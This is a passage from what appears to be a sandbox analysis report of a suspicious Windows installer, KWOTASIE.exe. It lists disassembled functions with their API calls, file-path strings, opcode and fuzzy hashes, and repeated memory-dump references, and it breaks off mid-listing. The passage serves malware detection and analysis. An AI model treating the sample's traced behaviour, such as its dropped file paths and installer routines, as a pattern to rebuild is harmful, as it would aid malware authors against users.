Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99

Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
GlobalFree.KERNEL32(?), ref: 00402950
GlobalFree.KERNEL32(00000000), ref: 00402963
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
Opcode Fuzzy Hash: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98

Function 00404A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
wsprintfW.USER32 ref: 00404B16
SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29

Strings

6B, xrefs: 00404AFF
%u.%u%s%s, xrefs: 00404AF7

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$6B
API String ID: 3540041739-3884863406
Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC

Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct,000000FF,frerhunde\bordeauxvske\negroization,00000400,?,?,00000021), ref: 004025E2
lstrlenA.KERNEL32(frerhunde\bordeauxvske\negroization,?,?,C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct,000000FF,frerhunde\bordeauxvske\negroization,00000400,?,?,00000021), ref: 004025ED

Strings

C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct, xrefs: 004025DB
frerhunde\bordeauxvske\negroization, xrefs: 004025AD, 004025D4, 004025E8, 00402634

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct$frerhunde\bordeauxvske\negroization
API String ID: 3109718747-2267309972
Opcode ID: ea6228ab94128025b834a3833227cb1239f09ae99d1f9cdb451e84d7ec2b7adc
Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
Opcode Fuzzy Hash: ea6228ab94128025b834a3833227cb1239f09ae99d1f9cdb451e84d7ec2b7adc
Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E

Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D5D
GetClientRect.USER32(00000000,?), ref: 00401D6A
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
DeleteObject.GDI32(00000000), ref: 00401DA8

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 3c90963baa5248ec8c3e32d30f7b74229283cbd29e4b1f5c47a94b45867cde17
Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
Opcode Fuzzy Hash: 3c90963baa5248ec8c3e32d30f7b74229283cbd29e4b1f5c47a94b45867cde17
Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78

Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1

Strings

!, xrefs: 00401C55

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28

Function 00405BC8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\,?,00405C3C,C:\,C:\,?,?,75923420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405BD6
CharNextW.USER32(00000000), ref: 00405BDB
CharNextW.USER32(00000000), ref: 00405BF3

Strings

C:\, xrefs: 00405BC9

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction ID: 71fcaf91f17ad0c61ae46c06a49b7004919c5bb89cc9bf949e59d58efb239cdc
Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction Fuzzy Hash: EAF09061914B2195EA3176544C45E7766BCEB96760B00807BE702B72C0EBB8A8C19FEE

Function 00405B1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 00405B23
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 00405B2D
lstrcatW.KERNEL32(?,0040A014), ref: 00405B3F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction ID: c0ef0cb97c36de63e92d9fca1924244fe31698b984028f6787b43ddfdde79dcc
Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction Fuzzy Hash: 7FD0A731106530AAC1117B548C04DDF72AC9E46344342047FF201B70A1C77C2D6287FD

Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
GetTickCount.KERNEL32 ref: 00402E8E
CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C

Function 00405224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405253
CallWindowProcW.USER32(?,?,?,?), ref: 004052A4

Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F

Strings

, xrefs: 00405234

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D

Function 004038C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75923420,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
GlobalFree.KERNEL32(?), ref: 004038E6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
Instruction ID: 4defd9e359f6bb8273ced32a5a12906ada9a5e6c3dc807c4d7f8d8681d186cd1
Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
Instruction Fuzzy Hash: 68E01233901520AFCA216F55ED04B5E77ADAF58B22F09417BF8807B2608B785C929BD8

Function 00405B69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KWOTASIE.exe,C:\Users\user\Desktop\KWOTASIE.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KWOTASIE.exe,C:\Users\user\Desktop\KWOTASIE.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B7F

Strings

C:\Users\user\Desktop, xrefs: 00405B69

Memory Dump Source

Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction ID: 4f2c6dc630764ad6ed400a220cd41f8d0a4aff102c3f5ecc88be1499634875f0
Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction Fuzzy Hash: F7D05EB2401920DAC3126704DC04DAF73A8EF12300746446AF841A6165D7786D818AAC

Function 00405CA3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CCB
CharNextA.USER32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CDC
